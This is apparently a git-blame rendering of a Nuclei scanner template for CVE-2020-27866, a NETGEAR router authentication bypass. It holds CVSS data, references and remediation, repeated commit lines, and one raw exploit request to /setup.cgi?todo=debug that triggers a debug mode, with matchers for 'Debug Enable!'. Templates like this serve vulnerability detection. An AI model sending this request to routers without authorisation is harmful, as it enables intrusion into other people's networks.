Create CVE-2020-27866.yaml
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-18 00:27:34 +00:00
id : CVE-2020-27866
info :
2022-07-26 13:45:11 +00:00
name : NETGEAR - Authentication Bypass
Create CVE-2020-27866.yaml
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-18 00:27:34 +00:00
author : gy741
severity : high
2022-07-26 13:45:11 +00:00
description : NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
2021-08-29 06:36:59 +00:00
- https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-27866
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-27866
2023-11-11 17:44:56 +00:00
cwe-id : CWE-288,CWE-287
2023-10-14 11:27:55 +00:00
epss-score : 0.00433
2023-11-14 14:37:18 +00:00
epss-percentile : 0.7169
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : netgear
product : ac2100_firmware
tags : cve,cve2020,netgear,auth-bypass
Create CVE-2020-27866.yaml
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-18 00:27:34 +00:00
2023-04-27 04:28:59 +00:00
http :
Create CVE-2020-27866.yaml
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-18 00:27:34 +00:00
- raw :
- |
GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Accept : */*
Accept-Language : en
Connection : close
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
Create CVE-2020-27866.yaml
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-18 00:27:34 +00:00
words :
2021-07-18 17:54:55 +00:00
- 'Debug Enable!'
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-11-14 14:37:18 +00:00
# digest: 4b0a00483046022100b88c42680fb3ea579217bed35e4cc709b6d35afd9bc970288ab5209967ccf4d3022100e258b674be5737dfd1eb48fecd348ba34295373c3aa5dd83eb10801049675125:922c64590222798bb761d5b6d8e72950